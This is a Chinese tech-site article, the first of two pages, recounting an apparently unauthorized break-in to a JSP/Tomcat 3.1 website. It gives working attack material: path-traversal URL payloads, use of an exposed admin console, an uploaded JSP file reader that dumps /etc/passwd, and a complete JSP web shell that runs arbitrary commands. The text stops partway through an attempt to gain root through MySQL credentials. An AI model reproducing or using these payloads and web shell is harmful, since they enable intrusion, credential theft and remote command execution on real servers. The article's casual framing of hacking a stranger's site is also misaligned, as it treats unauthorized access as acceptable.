文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络编程JSP入侵基于JSP+Tomcat的Web网站实录
精品推荐
特别推荐
·什么是 JSP 技术?
·JSP简介
·JSP数据库操作例程
·新手入门:学习JSP的经典的入门学习资料
·由浅入深学习动态网页制作PHP的编程与应用
·输入汉字自动转为拼音(jsp实现方式)
·经验分享 JSP程序员完全蜕变手册
·JSP实战:JBuilder2005中创建数据库表
·新手入门:JSP基本语法与简单表单处理
·使用技巧:在JSP页面中的应用JavaBean
·实例:JSP中把动态页面转换为静态页面
·使JSP/Servlet应用程序优化的八种方法
·提升JSP页面响应速度的七大秘籍绝招
·jsp中文问题解决方案(完整版)
·jsp的八个隐含对象
·用jsp实现SQLServe数据库的备份和恢复
·深入浅析JSP安全编程实例
·jsp防盗链
·js技巧收集(200多个)
·JSP应用语法详解大全 (3)
热点TOP10
·JSP简介
·目前最好的JSP分页技术(考虑到数据库移植,并修正过效率)
·在jsp中用bean和servlet联合实现用户注册、登录
·js技巧收集(200多个)
·用JSP+JavaScript打造二级级联下拉菜单
·关于JSP Commons FileUpload 组件上传文件的一些总结
·水晶报表的jsp实现
·目前最好的JSP分页技术
·不用迭代算法而快速实现的jsp树结构
·用JSP从数据库中读取图片并显示在网页上
·新手入门:学习JSP的经典的入门学习资料
·jsp-servlet技术:一篇写的详细的session的好文章
·在一个jsp页面实现二级下拉框联动
·JSP上传图片并生成缩略图
·输入汉字自动转为拼音(jsp实现方式)
·树形目录的递归实现数据库+jsp+javabean
·JSP连接SQL Server 2000系统配置
·jspSmartUpload上传下载全攻略
·jsp在线考试系统-jsp文件
·什么是 JSP 技术?

入侵基于JSP+Tomcat的Web网站实录
日期:2007年7月8日 作者: 查看:[大字体 中字体 小字体]

  很偶然的一个机会,浏览到一个网站,页面清新让人感觉很舒服。网站是用JSP开发的,出于个人爱好,我决定测试一下其系统的安全性。

telnet www.target.com 8080
GET /CHINANSL HTTP/1.1
[Enter]
[Enter]

  返回的结果如下:

HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404

<h1>Error: 404</h1>
<h2>Location: /CHINANSL</h2>File Not Found<br>/CHINANSL

  获得了运行的WEBServer的名称“Tomcat 3.1”。记得曾经发现过这个版本的漏洞,并且post到bugtrap上去过。

  回忆一下,大概是通过“..”技术可以退出WEB目录,于是:

http://target:8080/../../../../%00.jsp (不行)
http://target:8080/file/index.jsp (不行)
http://target:8080/index.JSP (不行)
http://target:8080/index.jsp%81 (不行)
http://target:8080/index.js%70 (不行)
http://target:8080/index.jsp%2581 (不行)
http://target:8080/WEB-INF/ (不行)

  看来安全状况似乎还不错,我们再来进行一下更深层的测试。Tomcat 3.1自带了一个管理工具,可以查看WEB下的目录及文件,并且可以添加context。于是尝试:

http://target:8080/admin/

  管理员果然没有删除或禁止访问这个目录,从安全的角度说,这点应该算是一个比较重要的失误。

  接着,点击“VIEW ALL CONTEXT”按钮,列出了WEB目录下的一些文件和目录的名称,很快发现了一个上传文件的组件,通过这个组件将一个JSP文件上传到对方的WEB目录里:

<%@ page import="java.io.*" %>
<%
String file = request.getParameter("file");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try{
fis = new FileInputStream(file);
dis = new DataInputStream(fis);
while(true){
try{
str = dis.readLine();
}catch(Exception e){}
if(str == null)break;
out.print(str+"<br>");
}
}catch(IOException e){}
%>


  然后执行:

http://target:8080/upload/test.jsp?file=/etc/passwd

  密码出来了。接下来的过程是猜测密码,没有成功。不过,现在相当于有了一个SHELL,猜不出密码可以先把IE当作SHELL环境。

  再写一个JSP文件:

<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>


  然后把这个JSP再通过upload上传,有SHELL了。

http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(详细结果这里就不列出来了)

  怎么获得root权限呢?经过一番搜索发现系统安装了MySQL,并且从JSP的源代码中得到了MySQL的密码,执行:

sqld">http://target:8080/upload/cmd.jsp?cmd=ps+aux+grep+mysqld



[1] [2] 下一页 




上一篇:在win2000中安装JSP

下一篇:Mysql与JSP网页中文乱码问题的解决方案

入侵基于JSP+Tomcat的Web网站实录 相关文章:
·28个免费在线电影网站
·中国十大免费电影网站排行
·如何建立一个网站?规划、设计、目的、原则、宣传
·网络玄幻小说十大网站
·台湾500大网站排行榜
·黑客技术之知道对方IP入侵别人的电脑
·色情视频网站“女主持”网上脱衣表演被逮捕
·外挂 录象 网站 举报方案最新教程_QQ堂
·不可以不看的一些网站
·制作网站的步骤和方法
入侵基于JSP+Tomcat的Web网站实录 相关软件:
·自己动手建立企业网站
·自己动手建设个人网站
·闪魂——Flash网站建设实录
·公司企业网站管理系统模板功能强大版
·各大MP3搜索网站前十名下载曲目
·大案实录
·爆出网站数据库路径
·400套超酷网站模板
·破解收费网站 的经典教程
·5000个大型网站源代码打包下载 ASP/PHP 急要和我联系

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot